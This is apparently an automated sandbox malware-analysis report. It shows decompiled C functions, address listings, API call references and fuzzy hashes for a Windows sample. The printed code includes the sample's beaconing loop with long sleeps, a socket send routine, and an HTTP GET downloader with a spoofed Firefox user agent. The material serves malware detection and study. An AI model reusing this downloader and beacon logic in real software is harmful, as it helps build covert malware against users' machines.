                            • GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00402BF6
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$Alloc$ContextFree$AcquireBufferCredentialsDecryptHandleInitializeMessageSecurityselectwsprintf
                            • String ID: GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
                            • API String ID: 3270067178-3041754183
                            • Opcode ID: c95945b4ea4b892c9ccea1685e0d4e81c8f7c73a01b14d1460add4aded233223
                            • Instruction ID: 697e2958990b10f9deb7ce1736b938772ac7a4ddc3f0d0008d2bd1d4b0e5c5f2
                            • Opcode Fuzzy Hash: c95945b4ea4b892c9ccea1685e0d4e81c8f7c73a01b14d1460add4aded233223
                            • Instruction Fuzzy Hash: 0A413DF290011CBADB21AA91CD45FEE77BCAB44308F5044BAB705B20C1E7749F859B6C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0040490E() {
                            				char _v402;
                            				intOrPtr _v412;
                            				char _v420;
                            				intOrPtr _v424;
                            				char _v436;
                            				char _v440;
                            				char* _t21;
                            				intOrPtr _t27;
                            				signed int _t31;
                            				void* _t33;
                            				void* _t34;
                            
                            				E004066D2( &_v440, _t33 - _t34);
                            				goto L1;
                            				L3:
                            				L3:
                            				if(_v412 == 0) {
                            					_t38 = _v440;
                            					if(_v440 == 0) {
                            						L004071F6();
                            						_v440 = _t27;
                            					}
                            				}
                            				_t27 = E00404E45(_t31, _t38, _v412, _v424);
                            				if(_t27 != 0) {
                            					goto L14;
                            				}
                            				while(_v412 != 0) {
                            					__eflags = _v412 - 0x409010;
                            					if(__eflags == 0) {
                            						_v412 = 0x409043;
                            						L13:
                            						goto L3;
                            					}
                            					_v412 = 0;
                            					_t27 = 0;
                            					__eflags = 0;
                            					asm("repe scasb");
                            					if(0 == 0) {
                            						continue;
                            					}
                            					goto L13;
                            				}
                            				_v412 = 0x409010;
                            				goto L13;
                            				L14:
                            				Sleep(0x2bf20);
                            				goto L3;
                            				L1:
                            				Sleep(0x2710);
                            				_t21 =  &_v402;
                            				_push(_t21);
                            				_push(0x202);
                            				L0040714E();
                            				if(_t21 != 0) {
                            					goto L1;
                            				} else {
                            					_v412 = 0x409010;
                            					E004066E9(0x409076, 0xffffffff,  &_v420);
                            					_v424 = E00406663( &_v420);
                            					_t27 = E004066E9(0x409080, 0xa,  &_v436);
                            					goto L3;
                            				}
                            			}














                            0x00404922
                            0x00404922
                            0x00000000
                            0x00404988
                            0x0040498f
                            0x00404991
                            0x00404998
                            0x0040499a
                            0x0040499f
                            0x0040499f
                            0x00404998
                            0x004049b1
                            0x004049b8
                            0x00000000
                            0x00000000
                            0x004049ba
                            0x004049cf
                            0x004049d9
                            0x004049f8
                            0x00404a02
                            0x00000000
                            0x00404a02
                            0x004049db
                            0x004049eb
                            0x004049eb
                            0x004049f2
                            0x004049f4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004049f6
                            0x004049c3
                            0x00000000
                            0x00404a04
                            0x00404a09
                            0x00000000
                            0x00404927
                            0x0040492c
                            0x00404931
                            0x00404937
                            0x00404938
                            0x0040493d
                            0x00404944
                            0x00000000
                            0x00404946
                            0x00404946
                            0x0040495e
                            0x0040496f
                            0x00404983
                            0x00000000
                            0x00404983

                            APIs
                            • Sleep.KERNEL32(00002710,?), ref: 0040492C
                            • WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 0040493D
                            • InitSecurityInterfaceA.SECUR32(0002BF20,?,?,00409080,0000000A,?,?,00409076,000000FF,?,00000202,?,00002710,?), ref: 0040499A
                            • Sleep.KERNEL32(0002BF20,?,?,00409080,0000000A,?,?,00409076,000000FF,?,00000202,?,00002710,?), ref: 00404A09
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$InitInterfaceSecurityStartup
                            • String ID:
                            • API String ID: 3734495323-0
                            • Opcode ID: 71723e124fca48b28b3612ebc5a364367969b117390cce892358d302deb684e0
                            • Instruction ID: 67c9d3a234dc958c668ef25af7fc1d8218e846a58c6cf8f5c7768994ce5c23a6
                            • Opcode Fuzzy Hash: 71723e124fca48b28b3612ebc5a364367969b117390cce892358d302deb684e0
                            • Instruction Fuzzy Hash: 4A2192B09042189ADF209B648D46BEAB278AF45304F1001FBA709B51C2DBBC4EC48F1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E004062FA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                            				char _v8;
                            				char _v28;
                            				char* _t20;
                            				intOrPtr _t24;
                            
                            				_v8 = 0xa;
                            				if(_a16 != 0) {
                            					WaitForSingleObject(_a16, 0xffffffff);
                            				}
                            				_t24 = _a8;
                            				while(_a12 != 0) {
                            					E00406698(_a4, 0,  &_v28, 0, 0);
                            					_push(0);
                            					_push(0);
                            					_t20 =  &_v28;
                            					_push(_t20);
                            					_push(0);
                            					_push(0);
                            					L0040717E();
                            					if(_t20 == 1) {
                            						_push(0);
                            						_push(_a12);
                            						_push(_t24);
                            						_push(_a4);
                            						L00407184();
                            						if(_t20 > 0) {
                            							_a12 = _a12 - _t20;
                            							_t24 = _t24 + _t20;
                            							_t12 =  &_v8;
                            							 *_t12 = _v8 - 1;
                            							if( *_t12 != 0) {
                            								continue;
                            							}
                            						}
                            					}
                            					break;
                            				}
                            				if(_a16 != 0) {
                            					SetEvent(_a16);
                            				}
                            				return _a12;
                            			}







                            0x00406303
                            0x0040630e
                            0x00406315
                            0x00406315
                            0x0040631a
                            0x00406363
                            0x0040632c
                            0x00406331
                            0x00406333
                            0x00406335
                            0x00406338
                            0x00406339
                            0x0040633b
                            0x0040633d
                            0x00406345
                            0x00406347
                            0x00406349
                            0x0040634c
                            0x0040634d
                            0x00406350
                            0x00406357
                            0x00406359
                            0x0040635c
                            0x0040635e
                            0x0040635e
                            0x00406361
                            0x00000000
                            0x00000000
                            0x00406361
                            0x00406357
                            0x00000000
                            0x00406345
                            0x0040636d
                            0x00406372
                            0x00406372
                            0x0040637e

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00406315
                            • select.WSOCK32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 0040633D
                            • send.WSOCK32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00406350
                            • SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00406372
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventObjectSingleWaitselectsend
                            • String ID:
                            • API String ID: 3746265427-0
                            • Opcode ID: 98f11bb09f3b93e626448c475974db9ab6e3e0f3ab6bb93f52fe6e657960d5a4
                            • Instruction ID: 19284923bb4e021495b0ddac013d5bc273f4250205a3c6971fa947f4f7757753
                            • Opcode Fuzzy Hash: 98f11bb09f3b93e626448c475974db9ab6e3e0f3ab6bb93f52fe6e657960d5a4
                            • Instruction Fuzzy Hash: 0F115B3154020AABEF209E55CC06FEB3768BB00315F11453ABE11B92D1C7B9A960CBEA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E00402A45(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v8;
                            				char _v16;
                            				char _v1072;
                            				char _v1076;
                            				char _v1080;
                            				char _v1084;
                            				void* _t58;
                            				void* _t59;
                            				void* _t61;
                            
                            				_t61 = __eflags;
                            				E004066D2( &_v1084,  &_v16 - _t59);
                            				E004048E1(_a16);
                            				if(E00402765(__edx, _t61,  &_v8, _a4, _a8, 0xa) != 0) {
                            					_t40 = E004062FA(_v8,  &_v1072, wsprintfA( &_v1072, "GET %s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\r\nConnection: close\r\n\r\n", _a12, _a4), 0);
                            					_t58 = 0;
                            					while(_t58 <= 0x400) {
                            						_t13 =  &_v1072; // -1068
                            						_t40 = E004063CD(__eflags, _v8, _t58 + _t13, 1, 0xa);
                            						__eflags = _t40 - 1;
                            						if(_t40 == 1) {
                            							_t58 = _t58 + 1;
                            							__eflags = _t58 - 4;
                            							if(__eflags < 0) {
                            								continue;
                            							} else {
                            								__eflags =  *[ss:edi+ebp-0x430] - 0xa0d0a0d;
                            								if(__eflags != 0) {
                            									continue;
                            								} else {
                            									while(1) {
                            										_push( &_v1076);
                            										_push(0x4004667f);
                            										_push(_v8);
                            										L00407172();
                            										__eflags = _v1076;
                            										if(_v1076 == 0) {
                            											_v1076 = 0x1000;
                            										}
                            										_t40 = E00404878( &_v1080, _v1084, _v1076 + _v1084);
                            										__eflags = _t40;
                            										if(_t40 == 0) {
                            											goto L14;
                            										}
                            										while(1) {
                            											__eflags = _v1076;
                            											if(__eflags == 0) {
                            												break;
                            											}
                            											_t40 = E004063CD(__eflags, _v8, _v1080 + _v1084, _v1076, 0xa);
                            											__eflags = _t40;
                            											if(_t40 > 0) {
                            												_v1084 = _v1084 + _t40;
                            												_t29 =  &_v1076;
                            												 *_t29 = _v1076 - _t40;
                            												__eflags =  *_t29;
                            												continue;
                            											}
                            											goto L14;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L14;
                            					}
                            				}
                            				L14:
                            				E004064B7(_t40, _v8);
                            				E0040664B( &_v1080, _a16, 4);
                            				return _v1084;
                            			}












                            0x00402a45
                            0x00402a5c
                            0x00402a64
                            0x00402a7c
                            0x00402aa9
                            0x00402aae
                            0x00402b75
                            0x00402ab9
                            0x00402ac4
                            0x00402ac9
                            0x00402acc
                            0x00402ad2
                            0x00402ad3
                            0x00402ad6
                            0x00000000
                            0x00402adc
                            0x00402adc
                            0x00402ae8
                            0x00000000
                            0x00000000
                            0x00402aee
                            0x00402af4
                            0x00402af5
                            0x00402afa
                            0x00402afd
                            0x00402b02
                            0x00402b09
                            0x00402b0b
                            0x00402b0b
                            0x00402b2f
                            0x00402b34
                            0x00402b36
                            0x00000000
                            0x00000000
                            0x00402b67
                            0x00402b67
                            0x00402b6e
                            0x00000000
                            0x00000000
                            0x00402b52
                            0x00402b57
                            0x00402b59
                            0x00402b5b
                            0x00402b61
                            0x00402b61
                            0x00402b61
                            0x00000000
                            0x00402b61
                            0x00000000
                            0x00402b59
                            0x00402b70
                            0x00402aee
                            0x00402ae8
                            0x00402ad6
                            0x00000000
                            0x00402acc
                            0x00402b75
                            0x00402b81
                            0x00402b84
                            0x00402b95
                            0x00402ba4

                            APIs
                              • Part of subcall function 004048E1: VirtualFree.KERNEL32(?,00000000,00008000,?,?,000000C7,?,00405802,?,?,?,?,?,?,00000000,00000006), ref: 004048F8
                              • Part of subcall function 00402765: socket.WSOCK32(00000002,00000001,00000006,?,?,?,?,00000003), ref: 00402787
                              • Part of subcall function 00402765: setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?,00000003), ref: 004027B7
                              • Part of subcall function 00402765: inet_addr.WSOCK32(00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004), ref: 004027FA
                              • Part of subcall function 00402765: htons.WSOCK32(?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 0040281B
                              • Part of subcall function 00402765: ioctlsocket.WSOCK32(?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?,00000006,00000001,?), ref: 00402843
                              • Part of subcall function 00402765: connect.WSOCK32(?,?,00000010,?,8004667E,?,?,00000000,00000000,?,00000002,?,?,000000FF,?,?), ref: 00402851
                              • Part of subcall function 00402765: select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 00402877
                              • Part of subcall function 00402765: ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 0040289A
                            • wsprintfA.USER32 ref: 00402A94
                              • Part of subcall function 004062FA: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 00406315
                              • Part of subcall function 004062FA: SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?), ref: 00406372
                            • ioctlsocket.WSOCK32(?,4004667F,?), ref: 00402AFD
                            Strings
                            • GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close, xrefs: 00402A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ioctlsocket$EventFreeObjectSingleVirtualWaitconnecthtonsinet_addrselectsetsockoptsocketwsprintf
                            • String ID: GET %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Connection: close
                            • API String ID: 2667627932-3041754183
                            • Opcode ID: c519f40087b61c8c09e90ab7eab3044290cf3230762dea64b974e032bef64f1e
                            • Instruction ID: 595c3d9a09f59ec12dd5ce587d2472663833f294b73f30c898c999aa767493f9
                            • Opcode Fuzzy Hash: c519f40087b61c8c09e90ab7eab3044290cf3230762dea64b974e032bef64f1e
                            • Instruction Fuzzy Hash: 1A3161B1D00218AADF21AE65CD86FDE7378AB44318F4011B6BA09B10D1D779AF94DF1D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,40000000,00000000,00000000,?,00000080,00000000,?,?), ref: 00676D1A
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 00676D5E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateFileHandle
                            • String ID: d
                            • API String ID: 3498533004-2564639436
                            • Opcode ID: 6e50d3a25c05377f6ab5a05f454e07e7ca2839e05d34e7005a04afe9d65ec923
                            • Instruction ID: 4a22902a13122b269bcd53e4898f5dab7c03300928481e491fb2da9182f3d500
                            • Opcode Fuzzy Hash: 6e50d3a25c05377f6ab5a05f454e07e7ca2839e05d34e7005a04afe9d65ec923
                            • Instruction Fuzzy Hash: 1D01F631A50608FADF219FA4DC46FDE7B36AF00724F208265F624741E1D7B16A60EB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00406474(intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
                            				void* _t7;
                            				intOrPtr* _t9;
                            				intOrPtr* _t10;
                            
                            				_t10 = _a4;
                            				if( *_t10 != 0 ||  *((intOrPtr*)(_t10 + 4)) != 0) {
                            					_push(_t10);
                            					L004071D2();
                            				}
                            				_t9 = _a8;
                            				if( *_t9 != 0 ||  *((intOrPtr*)(_t9 + 4)) != 0) {
                            					_push(_t9);
                            					L004071E4();
                            				}
                            				if(_a12 != 0) {
                            					return E004064B7(_t7, _a12);
                            				}
                            				return _t7;
                            			}






                            0x0040647a
                            0x00406480
                            0x00406488
                            0x00406489
                            0x00406489
                            0x0040648e
                            0x00406494
                            0x0040649c
                            0x0040649d
                            0x0040649d
                            0x004064a6
                            0x00000000
                            0x004064ab
                            0x004064b4

                            APIs
                            • DeleteSecurityContext.SECUR32(?,?,orvsmwx,00000003,?,004057C6,?,?,?,?,00000000,00000006,?,00000000,00000002,00000000), ref: 00406489
                            • FreeCredentialsHandle.SECUR32(?,?,?,orvsmwx,00000003,?,004057C6,?,?,?,?,00000000,00000006,?,00000000,00000002), ref: 0040649D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ContextCredentialsDeleteFreeHandleSecurity
                            • String ID: orvsmwx
                            • API String ID: 4037185482-3620674537
                            • Opcode ID: c4704e1dfcb5a0f8468d6a37cc87ed677983547eb0f0d279c3c131e5742a891e
                            • Instruction ID: fe625ff1ef3543bbf82bf0272f0b0363299bd1eea17b1a14b6a0b9b489f8df7e
                            • Opcode Fuzzy Hash: c4704e1dfcb5a0f8468d6a37cc87ed677983547eb0f0d279c3c131e5742a891e
                            • Instruction Fuzzy Hash: 3EF06D31400209EFDB215E09CC04B9F73A9AB41329F05C43BF816362C083BCADB0CAAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ExitProcess.KERNEL32(00000000,orvsmwx), ref: 00677237
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: J$orvsmwx
                            • API String ID: 621844428-2586457356
                            • Opcode ID: 1339a018b85b2b9e57f908d7aa3179d9432ac81887f2cc1ddeb02ef56bc30cd7
                            • Instruction ID: 9f6e0e94eb55f68cd34f818517d0e379be91659793412c8c51e2cd8112b6b6f4
                            • Opcode Fuzzy Hash: 1339a018b85b2b9e57f908d7aa3179d9432ac81887f2cc1ddeb02ef56bc30cd7
                            • Instruction Fuzzy Hash: C5E04831208308BADF412F95DC06A9A3B57DF41365F10D03AF53D24053CA715561BB6A
                            Uniqueness

                            Uniqueness Score: -1.00%